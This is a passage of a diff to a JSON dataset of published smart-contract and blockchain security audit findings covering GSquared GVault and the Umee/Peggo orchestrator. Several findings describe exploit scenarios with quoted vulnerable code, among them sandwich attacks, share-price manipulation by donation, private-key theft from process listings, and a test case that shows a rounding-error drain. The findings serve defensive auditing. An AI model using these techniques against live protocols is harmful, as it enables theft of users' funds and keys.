can deposit into the vault function maxDeposit ( address ) public pure override returns ( uint256 maxAssets ) return type( uint256 ).max; 293 294 295 296 297 298 299 { 300 301 } . . . 315 316 317 318 } /// @notice maximum number of shares that can be minted function maxMint ( address ) public pure override returns ( uint256 maxShares ) { return type( uint256 ).max; Figure 4.1: The maxDeposit and maxMint functions from GVault.sol This implementation, however, does not provide any valuable information to the user and may lead to faulty integrations with third-party systems. Exploit Scenario A third-party protocol wants to deposit into a GVault . It rst calls maxDeposit to know the maximum amount of asserts it can deposit and then calls deposit . However, the latter function call will revert because the value is too large. Recommendations Short term, return suitable values in maxDeposit and maxMint by considering the amount of assets owned by the caller as well any other global condition (e.g., a contract is paused). Long term, ensure compliance with the EIP specication that is being implemented (in this case, EIP-4626).", + "title": "27. Potential overows in Peggo's current block calculations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "In a few code paths, Peggo calculates the number of a delayed block by subtracting a delay value from the latest block number. This subtraction will result in an overow and cause Peggo to operate incorrectly if it is run against a blockchain node whose latest block number is less than the delay value. We set the severity of this nding to informational because the issue is unlikely to occur in practice; moreover, it is easy to have Peggo wait to perform the calculation until the latest block number is one that will not cause an overow. An overow may occur in the following methods: gravityOrchestrator.GetLastCheckedBlock (gure 27.1) gravityOrchestrator.CheckForEvents gravityOrchestrator.EthOracleMainLoop gravityRelayer.FindLatestValset // add delay to ensure minimum confirmations are received and block is finalized currentBlock := latestHeader.Number.Uint64() - ethBlockConfirmationDelay Figure 27.1: peggo/orchestrator/oracle_resync.go#L35-L42 Recommendations Short term, have Peggo wait to calculate the current block number until the blockchain for which Peggo was congured reaches a block number that will not cause an overow.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2732,29 +5480,29 @@ ] }, { - "title": "5. moveStrategy runs of out gas for large inputs ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "Reordering strategies can trigger operations that will run out-of-gas before completion. A GVault contract allows dierent strategies to be added into a queue. Since the order of them is important, the contract provides moveStrategy , a function to let the owner to move a strategy to a certain position of the queue. 500 501 502 503 504 505 506 507 508 509 510 511 } /// @notice Move the strategy to a new position /// @param _strategy Target strategy to move /// @param _pos desired position of strategy /// @dev if the _pos value is >= number of strategies in the queue, /// the strategy will be moved to the tail position function moveStrategy ( address _strategy , uint256 _pos ) external onlyOwner { uint256 currentPos = getStrategyPositions(_strategy); uint256 _strategyId = strategyId[_strategy]; if (currentPos > _pos) move( uint48 (_strategyId), uint48 (currentPos - _pos), false ); else move( uint48 (_strategyId), uint48 (_pos - currentPos), true ); Figure 5.1: The moveStrategy function from GVault.sol The documentation states that if the position to move a certain strategy is larger than the number of strategies in the queue, then it will be moved to the tail of the queue. This implemented using the move function: 171 172 173 174 175 176 177 178 179 180 181 182 ) internal { /// @notice move a strategy to a new position in the queue /// @param _id id of strategy to move /// @param _steps number of steps to move the strategy /// @param _back move towards tail (true) or head (false) /// @dev Moves a strategy a given number of steps. If the number /// of steps exceeds the position of the head/tail, the /// strategy will take the place of the current head/tail function move ( uint48 _id , uint48 _steps , bool _back 183 184 185 186 187 188 189 190 Strategy storage oldPos = nodes[_id]; if (_steps == 0 ) return ; if (oldPos.strategy == ZERO_ADDRESS) revert NoIdEntry(_id); uint48 _newPos = !_back ? oldPos.prev : oldPos.next; for ( uint256 i = 1 ; i < _steps; i++) { _newPos = !_back ? nodes[_newPos].prev : nodes[_newPos].next; } Figure 5.2: The header of the move function from StrategyQueue.sol However, if a large number of steps is used, the loop will never nish without running out of gas. A similar issue aects StrategyQueue.withdrawalQueue , if called directly. Exploit Scenario Alice creates a smart contract that acts as the owner of a GVault. She includes code to reorder strategies using a call to moveStrategy . Since she wants to ensure that a certain strategy is always moved to the end of the queue, she uses a very large value as the position. When the code runs, it will always run out of gas, blocking the operation. Recommendations Short term, ensure the execution of the move ends in a number of steps that is bounded by the number of strategies in the queue. Long term, use unit tests and fuzzing tools like Echidna to test that the protocol works as expected, even for edge cases.", + "title": "28. Peggo does not validate Ethereum address formats ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "In several code paths in the Peggo codebase, the go-ethereum HexToAddress function (gure 28.1) is used to parse Ethereum addresses. This function does not return an error when the format of the address passed to it is incorrect. The HexToAddress function is used in tests as well as in the following parts of the codebase: peggo/cmd/peggo/bridge.go#L143 (in the peggo deploy-gravity command, to parse addresses fetched from gravityQueryClient ) peggo/cmd/peggo/bridge.go#L403 (in parsing of the peggo send-to-cosmos command's token-address argument) peggo/cmd/peggo/orchestrator.go#L150 (in the peggo orchestrator [gravity-addr] command) peggo/cmd/peggo/bridge.go#L536 and twice in #L545-L555 peggo/cmd/peggo/keys.go#L199 , #L274 , and #L299 peggo/orchestrator/ethereum/gravity/message_signatures.go#L36 , #L40 , #L102 , and #L117 p eggo/orchestrator/ethereum/gravity/submit_batch.go#L53 , #L72 , #L94 , #L136 , and #L144 peggo/orchestrator/ethereum/gravity/valset_update.go#L37 , #L55 , and #L87 peggo/orchestrator/main_loops.go#L307 peggo/orchestrator/relayer/batch_relaying.go#L81-L82 , #L237 , and #L250 We set the severity of this nding to undetermined because time constraints prevented us from verifying the impact of the issue. However, without additional validation of the addresses fetched from external sources, Peggo may operate on an incorrect Ethereum address. // HexToAddress returns Address with byte values of s. // If s is larger than len(h), s will be cropped from the left. func HexToAddress( s string ) Address { return BytesToAddress( FromHex(s) ) } // FromHex returns the bytes represented by the hexadecimal string s. // s may be prefixed with \"0x\". func FromHex(s string ) [] byte { if has0xPrefix(s) { s = s[ 2 :] } if len (s)% 2 == 1 { s = \"0\" + s } return Hex2Bytes(s) } // Hex2Bytes returns the bytes represented by the hexadecimal string str. func Hex2Bytes(str string ) [] byte { h, _ := hex.DecodeString(str) return h } Figure 28.1: The HexToAddress function, which calls the BytesToAddress , FromHex , and Hex2Bytes functions, ignores any errors that occur during hex-decoding. Recommendations Short term, review the code paths that use the HexToAddress function, and use a function like ValidateEthAddress to validate Ethereum address string formats before calls to HexToAddress . Long term, add tests to ensure that all code paths that use the HexToAddress function properly validate Ethereum address strings before parsing them.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "6. GVault withdrawals from ConvexStrategy are vulnerable to sandwich attacks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "Token swaps that may be executed during vault withdrawals are vulnerable to sandwich attacks. Note that this is applicable only if a user withdraws directly from the GVault , not through the GRouter contract. The ConvexStrategy contract performs token swaps through Uniswap V2, Uniswap V3, and Curve. All platforms allow the caller to specify the minimum-amount-out value, which indicates the minimum amount of tokens that a user wishes to receive from a swap. This provides protection against illiquid pools and sandwich attacks. Many of the swaps that the ConvexStrategy contract performs have the minimum-amount-out value hardcoded to zero. But a majority of these swaps can be triggered only by a Gelato keeper, which uses a private channel to relay all transactions. Thus, these swaps cannot be sandwiched. However, this is not the case with the ConvexStrategy.withdraw function. The withdraw function will be called by the GVault contract if the GVault does not have enough tokens for a user withdrawal. If the balance is not sucient, ConvexStrategy.withdraw will be called to retrieve additional assets to complete the withdrawal request. Note that the transaction to withdraw assets from the protocol will be visible in the public mempool (gure 6.1). function withdraw ( uint256 _amount ) 771 772 773 774 { 775 776 777 778 779 780 781 782 783 784 785 external returns ( uint256 withdrawnAssets , uint256 loss ) if ( msg.sender != address (VAULT)) revert StrategyErrors.NotVault(); ( uint256 assets , uint256 balance , ) = _estimatedTotalAssets( false ); // not enough assets to withdraw if (_amount >= assets) { balance += sellAllRewards(); balance += divestAll( false ); if (_amount > balance) { loss = _amount - balance; withdrawnAssets = balance; } else { withdrawnAssets = _amount; 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 } } } else { // check if there is a loss, and distribute it proportionally // if it exists uint256 debt = VAULT.getStrategyDebt(); if (debt > assets) { loss = ((debt - assets) * _amount) / debt; _amount = _amount - loss; } if (_amount <= balance) { withdrawnAssets = _amount; } else { withdrawnAssets = divest(_amount - balance, false ) + balance; if (withdrawnAssets < _amount) { loss += _amount - withdrawnAssets; } else { if (loss > withdrawnAssets - _amount) { loss -= withdrawnAssets - _amount; } else { loss = 0 ; } } } } ASSET.transfer( msg.sender , withdrawnAssets); return (withdrawnAssets, loss); Figure 6.1: The withdraw function in ConvexStrategy.sol#L771-812 In the situation where the _amount that needs to be withdrawn is more than or equal to the total number of assets held by the contract, the withdraw function will call sellAllRewards and divestAll with _ slippage set to false (see the highlighted portion of gure 6.1). The sellAllRewards function, which will call _sellRewards , sells all the additional reward tokens provided by Convex, its balance of CRV, and its balance of CVX for WETH. All these swaps have a hardcoded value of zero for the minimum-amount-out. Similarly, if _ slippage is set to false when calling divestAll , the swap species a minimum-amount-out of zero. By specifying zero for all these token swaps, there is no guarantee that the protocol will receive any tokens back from the trade. For example, if one or more of these swaps get sandwiched during a call to withdraw , there is an increased risk of reporting a loss that will directly aect the amount the user is able to withdraw. Exploit Scenario Alice makes a call to withdraw to remove some of her funds from the protocol. Eve notices this call in the public transaction mempool. Knowing that the contract will have to sell some of its rewards, Eve identies a pure prot opportunity and sandwiches one or more of the swaps performed during the transaction. The strategy now has to report a loss, which results in Alice receiving less than she would have otherwise. Recommendations Short term, for _sellRewards , use the same minAmount calculation as in divestAll but replace debt with the contracts balance of a given reward token. This can be applied for all swaps performed in _sellRewards . For divestAll , set _slippage to true instead of false when it is called in withdraw . Long term, document all cases in which front-running may be possible and its implications for the codebase. Additionally, ensure that all users are aware of the risks of front-running and arbitrage when interacting with the GSquared system.", + "title": "29. Peggo takes an Ethereum private key as a command-line argument ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Certain Peggo commands take an Ethereum private key ( --eth-pk ) as a command-line argument. If an attacker gained access to a user account on a system running Peggo, the attacker would also gain access to any Ethereum private key passed through the command line. The attacker could then use the key to steal funds from the Ethereum account. $ peggo orchestrator {gravityAddress} \\ --eth-pk= $ETH_PK \\ --eth-rpc= $ETH_RPC \\ --relay-batches= true \\ --relay-valsets= true \\ --cosmos-chain-id=... \\ --cosmos-grpc= \"tcp://...\" \\ --tendermint-rpc= \"http://...\" \\ --cosmos-keyring=... \\ --cosmos-keyring-dir=... \\ --cosmos-from=... Figure 29.1: An example of a Peggo command line In Linux, all users can inspect other users commands and their arguments. A user can enable the proc lesystem's hidepid=2 gid=0 mount options to hide metadata about spawned processes from users who are not members of the specied group. However, in many Linux distributions, those options are not enabled by default. Exploit Scenario An attacker gains access to an unprivileged user account on a system running the Peggo orchestrator. The attacker then uses a tool such as pspy to inspect processes run on the system. When a user or script launches the Peggo orchestrator, the attacker steals the Ethereum private key passed to the orchestrator. Recommendations Short term, avoid using a command-line argument to pass an Ethereum private key to the Peggo program. Instead, fetch the private key from the keyring.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "7. Stop loss primer cannot be deactivated ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The stop loss primer cannot be deactivated because the keeper contract uses the incorrect function to check whether or not the meta pool has become healthy again. The stop loss primer is activated if the meta pool that is being used for yield becomes unhealthy. A meta pool is unhealthy if the price of the 3CRV token deviates from the expected price for a set amount of time. The primer can also be deactivated if, after it has been activated, the price of the token stabilizes back to a healthy value. Deactivating the primer is a critical feature because if the pool becomes healthy again, there is no reason to divest all of the strategys funds, take potential losses, and start all over again. The GStrategyResolver contract, which is called by a Gelato keeper, will check to identify whether a primer can be deactivated. This is done via the taskStopStopLossPrimer function. The function will attempt to call the GStrategyGuard.endStopLoss function to see whether the primer can be deactivated (gure 7.1). function taskStopStopLossPrimer () external view returns ( bool canExec , bytes memory execPayload) IGStrategyGuard executor = IGStrategyGuard(stopLossExecutor); if (executor.endStopLoss()) { canExec = true ; execPayload = abi.encodeWithSelector( executor.stopStopLossPrimer.selector ); } 46 47 48 49 50 { 51 52 53 54 55 56 57 58 } Figure 7.1: The taskStopStopLossPrimer function in GStrategyResolver.sol#L46-58 However, the GStrategyGuard contract does not have an endStopLoss function. Instead, it has a canEndStopLoss function. Note that the executor variable in taskStopStopLossPrimer is expected to implement the IGStrategyGuard function, which does have an endStopLoss function. However, the GStrategyGuard contract implements the IGuard interface, which does not have the endStopLoss function. Thus, the call to endStopLoss will simply return, which is equivalent to returning false , and the primer will not be deactivated. Exploit Scenario Due to market conditions, the price of the 3CRV token drops signicantly for an extended period of time. This triggers the Gelato keeper to activate the stop loss primer. Soon after, the price of the 3CRV token restabilizes. However, because of the incorrect function call in the taskStopStopLossPrimer function, the primer cannot be deactivated, the stop loss process completes, and all the funds in the strategy must be divested. Recommendations Short term, change the function call from endStopLoss to canEndStopLoss in taskStopStopLossPrimer . Long term, ensure that there are no near-duplicate interfaces for a given contract in the protocol that may lead to an edge case similar to this. Additionally, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "title": "30. Peggo allows the use of non-local unencrypted URL schemes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The peggo orchestrator command takes --tendermint-rpc and --cosmos-grpc ags specifying Tendermint and Cosmos remote procedure call (RPC) URLs. If an unencrypted non-local URL scheme (such as http:///) is passed to one of those ags, Peggo will not reject it or issue a warning to the user. As a result, an attacker connected to the same local network as the system running Peggo could launch a man-in-the-middle attack, intercepting and modifying the network trac of the device. $ peggo orchestrator {gravityAddress} \\ --eth-pk= $ETH_PK \\ --eth-rpc= $ETH_RPC \\ --relay-batches= true \\ --relay-valsets= true \\ --cosmos-chain-id=... \\ --cosmos-grpc= \"tcp://...\" \\ --tendermint-rpc= \"http://...\" \\ --cosmos-keyring=... \\ --cosmos-keyring-dir=... \\ --cosmos-from=... Figure 30.1: The problematic ags Exploit Scenario A user sets up Peggo with an external Tendermint RPC address and an unencrypted URL scheme (http://). An attacker on the same network performs a man-in-the-middle attack, modifying the values sent to the Peggo orchestrator to his advantage. Recommendations Short term, warn users that they risk a man-in-the-middle attack if they set the RPC endpoint addresses to external hosts that use unencrypted schemes such as http://.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -2762,89 +5510,89 @@ ] }, { - "title": "8. getYieldTokenAmount uses convertToAssets instead of convertToShares ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The getYieldTokenAmount function does not properly convert a 3CRV token amount into a G3CRV token amount, which may allow a user to withdraw more or less than expected or lead to imbalanced tranches after a migration. The expected behavior of the getYieldTokenAmount function is to return the number of G3CRV tokens represented by a given 3CRV amount. For withdrawals, this will determine how many G3CRV tokens should be returned back to the GRouter contract. For migrations, the function is used to gure out how many G3CRV tokens should be allocated to the senior and junior tranches. To convert a given amount of 3CRV to G3CRV, the GVault.convertToShares function should be used. However, the getYieldTokenAmount function uses the GVault.convertToAssets function (gure 8.1). Thus, getYieldTokenAmount takes an amount of 3CRV tokens and treats it as shares in the GVault , instead of assets. 169 170 171 172 173 { 174 175 } function getYieldTokenAmount ( uint256 _index , uint256 _amount ) internal view returns ( uint256 ) return getYieldToken(_index).convertToAssets(_amount); Figure 8.1: The getYieldTokenAmount function in GTranche.sol#L169-175 If the system is protable, each G3CRV share should be worth more over time. Thus, getYieldTokenAmount will return a value larger than expected because one share is worth more than one asset. This allows a user to withdraw more from the GTranche contract than they should be able to. Additionally, a protable system will cause the senior tranche to receive more G3CRV tokens than expected during migrations. A similar situation can happen if the system is not protable. Exploit Scenario Alice deposits $100 worth of USDC into the system. After a certain amount of time, the GSquared protocol becomes protable and Alice should be able to withdraw $110, making $10 in prot. However, due to the incorrect arithmetic performed in the getYieldTokenAmount function, Alice is able to withdraw $120 of USDC. Recommendations Short term, use convertToShares instead of convertToAssets in getYieldTokenAmount . Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "title": "31. Lack of prioritization of Peggo orchestrator messages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Peggo orchestrator messages, like oracle messages ( TOB-UMEE-20 ), are not prioritized over other transactions for inclusion in a block. As a result, if the network is highly congested, orchestrator transactions may not be included in the earliest possible block. Although the Umee system could increase the fee charged for including a Peggo orchestrator message in a block, that solution is suboptimal and may not work. Tactics for prioritizing important transactions include the following: Using the custom CheckTx implementation introduced in Tendermint version 0.35 , which returns a priority argument Reimplementing part of the Tendermint engine , as Terra Money did Using Substrates dispatch classes , which allow developers to mark transactions as normal , operational , or mandatory Exploit Scenario A user sends tokens from Ethereum to Umee by calling Gravity Bridges sendToCosmos function. When validators notice the transaction in the Ethereum logs, they send MsgSendToCosmosClaim messages to Umee. However, 34% of the messages are front-run by an attacker, eectively stopping Umee from acknowledging the token transfer. Recommendations Short term, use a custom CheckTx method to prioritize Peggo orchestrator messages. Long term, ensure that operations that aect the whole system cannot be front-run or delayed by attackers or blocked by network congestion. 32. Failure of a single broadcast Ethereum transaction causes a batch-wide failure Severity: Undetermined Diculty: High Type: Conguration Finding ID: TOB-UMEE-32 Target: Peggo orchestrator", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Undetermined", + "Difficulty: Medium" ] }, { - "title": "9. convertToShares can be manipulated to block deposits ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "An attacker can block operations by using direct token transfers to manipulate convertToShares , which computes the amount of shares to deposit. convertToShares is used in the GVault code to know how many shares correspond to certain amount of assets: 394 395 396 397 398 399 400 401 { 402 /// @notice Value of asset in shares /// @param _assets amount of asset to convert to shares function convertToShares ( uint256 _assets ) public view override returns ( uint256 shares ) uint256 freeFunds_ = _freeFunds(); // Saves an extra SLOAD if _freeFunds is non-zero. 403 404 } return freeFunds_ == 0 ? _assets : (_assets * totalSupply) / freeFunds_; Figure 9.1: The convertToShares function in GVault.sol This function relies on the _freeFunds function to calculate the amount of shares: 706 707 708 709 710 } /// @notice the number of total assets the GVault has excluding and profits /// and losses function _freeFunds () internal view returns ( uint256 ) { return _totalAssets() - _calculateLockedProfit(); Figure 9.2: The _freeFunds function in GVault.sol In the simplest case, _calculateLockedProfit() can be assumed as zero if there is no locked prot. The _totalAssets function is implemented as follows: 820 821 /// @notice Vault adapters total assets including loose assets and debts /// @dev note that this does not consider estimated gains/losses from the strategies 822 823 824 } function _totalAssets () private view returns ( uint256 ) { return asset.balanceOf( address ( this )) + vaultTotalDebt; Figure 9.3: The _totalAssets function in GVault.sol However, the fact that _totalAssets has a lower bound determined by asset.balanceOf(address(this)) can be exploited to manipulate the result by \"donating\" assets to the GVault address. Exploit Scenario Alice deploys a new GVault. Eve observes the deployment and quickly transfers an amount of tokens to the GVault address. One of two scenarios can happen: 1. 2. Eve transfers a minimal amount of tokens, forcing a positive amount of freeFunds . This will block any immediate calls to deposit, since it will result in zero shares to be minted. Eve transfers a large amount of tokens, forcing future deposits to be more expensive or resulting in zero shares. Every new deposit can increase the amount of free funds, making the eect more severe. It is important to note that although Alice cannot use the deposit function, she can still call mint to bypass the exploit. Recommendations Short term, use a state variable, assetBalance , to track the total balance of assets in the contract. Avoid using balanceOf , which is prone to manipulation. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "title": "33. Peggo orchestrators IsBatchProtable function uses only one price oracle ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The Peggo orchestrator relays batches of Ethereum transactions only when doing so will be protable (gure 33.1). To determine an operations protability, it uses the price of ETH in USD, which is fetched from a single sourcethe CoinGecko API. This creates a single point of failure, as a hacker with control of the API could eectively choose which batches Peggo would relay by manipulating the price. The IsBatchProfitable function (gure 33.2) fetches the ETH/USD price; the gravityRelayer.priceFeeder eld it uses is set earlier in the getOrchestratorCmd function (gure 33.3). func (s *gravityRelayer) RelayBatches( /* (...) */ ) error { // (...) for tokenContract, batches := range possibleBatches { // (...) // Now we iterate through batches per token type. for _, batch := range batches { // (...) // If the batch is not profitable, move on to the next one. if !s.IsBatchProfitable(ctx, batch.Batch, estimatedGasCost, gasPrice, s.profitMultiplier) { continue } // (...) Figure 33.1: peggo/orchestrator/relayer/batch_relaying.go#L173-L176 func (s *gravityRelayer) IsBatchProfitable( / * (...) */ ) bool { // (...) // First we get the cost of the transaction in USD usdEthPrice, err := s.priceFeeder.QueryETHUSDPrice() Figure 33.2: peggo/orchestrator/relayer/batch_relaying.go#L211-L223 func getOrchestratorCmd() *cobra.Command { cmd := &cobra.Command{ Use: \"orchestrator [gravity-addr]\" , Args: cobra.ExactArgs( 1 ), Short: \"Starts the orchestrator\" , RunE: func (cmd *cobra.Command, args [] string ) error { // (...) coingeckoAPI := konfig.String(flagCoinGeckoAPI) coingeckoFeed := coingecko.NewCoingeckoPriceFeed( /* (...) */ ) // (...) relayer := relayer.NewGravityRelayer( /* (...) */ , relayer.SetPriceFeeder(coingeckoFeed), ) Figure 33.3: peggo/cmd/peggo/orchestrator.go#L162-L188 Exploit Scenario All Peggo orchestrator instances depend on the CoinGecko API. An attacker hacks the CoinGecko API and falsies the ETH/USD prices provided to the Peggo relayers, causing them to relay unprotable batches. Recommendations Short term, address the Peggo orchestrators reliance on a single ETH/USD price feed. Consider using the price-feeder tool to fetch pricing information or reading prices from the Umee blockchain. Long term, implement protections against extreme ETH/USD price changes; if the ETH/USD price changes by too large a margin, have the system stop fetching prices and require an operator to investigate whether the issue was caused by malicious behavior. Additionally, implement tests to check the orchestrators handling of random and extreme changes in the prices reported by the price feed. References Check Coingecko prices separately from BatchRequesterLoop (GitHub issue)", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "10. Harvest operation could be blocked if eligibility check on a strategy reverts ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "During harvest, if any of the strategies in the queue were to revert, it would prevent the loop from reaching the end of the queue and also block the entire harvest operation. When the harvest function is executed, a loop iterates through each of the strategies in the strategies queue, and the canHarvest() check runs on each strategy to determine if it is eligible for harvesting; if it is, the harvest logic is executed on that strategy. 312 313 314 315 316 317 318 319 320 321 322 /// @notice Execute strategy harvest function harvest () external { if ( msg.sender != keeper) revert GuardErrors.NotKeeper(); uint256 strategiesLength = strategies.length; for ( uint256 i ; i < strategiesLength; i++) { address strategy = strategies[i]; if (strategy == address ( 0 )) continue ; if (IStrategy(strategy).canHarvest()) { if (strategyCheck[strategy].active) { IStrategy(strategy).runHarvest(); try IStrategy(strategy).runHarvest() {} catch Error( ... Figure 10.1: The harvest function in GStrategyGuard.sol However, if the canHarvest() check on a particular strategy within the loop reverts, external calls from the canHarvest() function to check the status of rewards could also revert. Since the call to canHarvest() is not inside of a try block, this would prevent the loop from proceeding to the next strategy in the queue (if there is one) and would block the entire harvest operation. Additionally, within the harvest function, the runHarvest function is called twice on a strategy on each iteration of the loop. This could lead to unnecessary waste of gas and possibly undened behavior. Recommendations Short term, wrap external calls within the loop in try and catch blocks, so that reverts can be handled gracefully without blocking the entire operation. Additionally, ensure that the canHarvest function of a strategy can never revert. Long term, carefully audit operations that consume a large amount of gas, especially those in loops. Additionally, when designing logic loops that make external calls, be mindful as to whether the calls can revert, and wrap them in try and catch blocks when necessary.", + "title": "34. Rounding errors may cause the module to incur losses ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The amount that a user has borrowed is calculated using AdjustedBorrow data and an InterestScalar value. Because the system uses xed-precision decimal numbers that are truncated to integer values, there may be small rounding errors in the computation of those amounts. If an error occurs, it will benet the user, whose repayment will be slightly lower than the amount the user borrowed. Figure 34.1 shows a test case demonstrating this vulnerability. It should be added to the umee/x/leverage/keeper/keeper_test.go le. Appendix G discusses general rounding recommendations. // Test rounding error bug - users can repay less than have borrowed // It should pass func (s *IntegrationTestSuite) TestTruncationBug() { lenderAddr, _ := s.initBorrowScenario() app, ctx := s.app, s.ctx // set some interesting interest scalar _ = s.app.LeverageKeeper.SetInterestScalar(s.ctx, umeeapp.BondDenom, sdk.MustNewDecFromStr( \"2.9\" )) // save initial balances initialSupply := s.app.BankKeeper.GetSupply(s.ctx, umeeapp.BondDenom) s.Require().Equal(initialSupply.Amount.Int64(), int64 ( 10000000000 )) initialModuleBalance := s.app.LeverageKeeper.ModuleBalance(s.ctx, umeeapp.BondDenom) // lender borrows 20 umee err := s.app.LeverageKeeper.BorrowAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, 20000000 )) s.Require().NoError(err) // lender repays in a few transactions iters := int64 ( 99 ) payOneIter := int64 ( 2000 ) amountDelta := int64 ( 99 ) // borrowed expects to \"earn\" this amount for i := int64 ( 0 ); i < iters; i++ { repaid, err := s.app.LeverageKeeper.RepayAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, payOneIter)) s.Require().NoError(err) s.Require().Equal(sdk.NewInt(payOneIter), repaid) } // lender repays remaining debt - less than he borrowed // we send 90000000, because it will be truncated to the actually owned amount repaid, err := s.app.LeverageKeeper.RepayAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, 90000000 )) s.Require().NoError(err) s.Require().Equal(repaid.Int64(), 20000000 -(iters*payOneIter)-amountDelta) // verify lender's new loan amount in the correct denom (zero) loanBalance := s.app.LeverageKeeper.GetBorrow(ctx, lenderAddr, umeeapp.BondDenom) s.Require().Equal(loanBalance, sdk.NewInt64Coin(umeeapp.BondDenom, 0 )) // we expect total supply to not change finalSupply := s.app.BankKeeper.GetSupply(s.ctx, umeeapp.BondDenom) s.Require().Equal(initialSupply, finalSupply) // verify lender's new umee balance // should be 10 - 1k from initial + 20 from loan - 20 repaid = 9000 umee // it is more -> borrower benefits tokenBalance := app.BankKeeper.GetBalance(ctx, lenderAddr, umeeapp.BondDenom) s.Require().Equal(tokenBalance, sdk.NewInt64Coin(umeeapp.BondDenom, 9000000000 +amountDelta)) // in test, we didn't pay interest, so module balance should not have changed // but it did because of rounding moduleBalance := s.app.LeverageKeeper.ModuleBalance(s.ctx, umeeapp.BondDenom) s.Require().NotEqual(moduleBalance, initialModuleBalance) s.Require().Equal(moduleBalance.Int64(), int64 ( 1000000000 -amountDelta)) } Figure 34.1: A test case demonstrating the rounding bug Exploit Scenario An attacker identies a high-value coin. He takes out a loan and repays it in a single transaction and then repeats the process again and again. By using a single transaction for both operations, he evades the borrowing fee (i.e., the interest scalar is not increased). Because of rounding errors in the systems calculations, he turns a prot by repaying less than he borrowed each time. His prots exceed the transaction fees, and he continues his attack until he has completely drained the module of its funds. Exploit Scenario 2 The Umee system has numerous users. Each user executes many transactions, so the system must perform many calculations. Each calculation with a rounding error causes it to lose a small amount of tokens, but eventually, the small losses add up and leave the system without the essential funds. Recommendations Short term, always use the rounding direction that will benet the module rather than the user. Long term, to ensure that users pay the necessary fees, consider prohibiting them from borrowing and repaying a loan in the same block. Additionally, use fuzz testing to ensure that it is not possible for users to secure free tokens. References How to Become a Millionaire, 0.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "11. Incorrect rounding direction in GVault ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The minting and withdrawal operations in the GVault use rounding in favor of the user instead of the protocol, giving away a small amount of shares or assets that can accumulate over time . convertToShares is used in the GVault code to know how many shares correspond to a certain amount of assets: 394 395 396 397 398 399 400 401 { 402 /// @notice Value of asset in shares /// @param _assets amount of asset to convert to shares function convertToShares ( uint256 _assets ) public view override returns ( uint256 shares ) uint256 freeFunds_ = _freeFunds(); // Saves an extra SLOAD if _freeFunds is non-zero. 403 404 } return freeFunds_ == 0 ? _assets : (_assets * totalSupply) / freeFunds_; Figure 11.1: The convertToShares function in GVault.sol This function rounds down, providing slightly fewer shares than expected for some amount of assets. Additionally, convertToAssets i s used in the GVault code to know how many assets correspond to certain amount of shares: 406 /// @notice Value of shares in underlying asset /// @param _shares amount of shares to convert to tokens function convertToAssets ( uint256 _shares ) 407 408 409 410 411 412 413 { public view override returns ( uint256 assets ) 414 uint256 _totalSupply = totalSupply; // Saves an extra SLOAD if _totalSupply is non-zero. 415 416 417 418 419 } return _totalSupply == 0 ? _shares : ((_shares * _freeFunds()) / _totalSupply); Figure 11.2: The convertToAssets function in GVault.sol This function also rounds down, providing slightly fewer assets than expected for some amount of shares. However, the mint function uses previewMint , which uses convertToAssets : 204 205 206 207 208 209 { 210 211 212 213 214 215 216 217 218 219 220 } function mint ( uint256 _shares , address _receiver ) external override nonReentrant returns ( uint256 assets ) // Check for rounding error in previewMint. if ((assets = previewMint(_shares)) == 0 ) revert Errors.ZeroAssets(); _mint(_receiver, _shares); asset.safeTransferFrom( msg.sender , address ( this ), assets); emit Deposit( msg.sender , _receiver, assets, _shares); return assets; Figure 12.3: The mint function in GVault.sol This means that the function favors the user, since they get some xed amount of shares for a rounded-down amount of assets. In a similar way, the withdraw function uses convertToShares : function withdraw ( uint256 _assets , address _receiver , address _owner 227 228 229 230 231 ) external override nonReentrant returns ( uint256 shares ) { 232 if (_assets == 0 ) revert Errors.ZeroAssets(); 233 234 235 236 shares = convertToShares(_assets); if (shares > balanceOf[_owner]) revert Errors.InsufficientShares(); 237 238 239 if ( msg.sender != _owner) { uint256 allowed = allowance[_owner][ msg.sender ]; // Saves gas for limited approvals. 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 } if (allowed != type( uint256 ).max) allowance[_owner][ msg.sender ] = allowed - shares; } _assets = 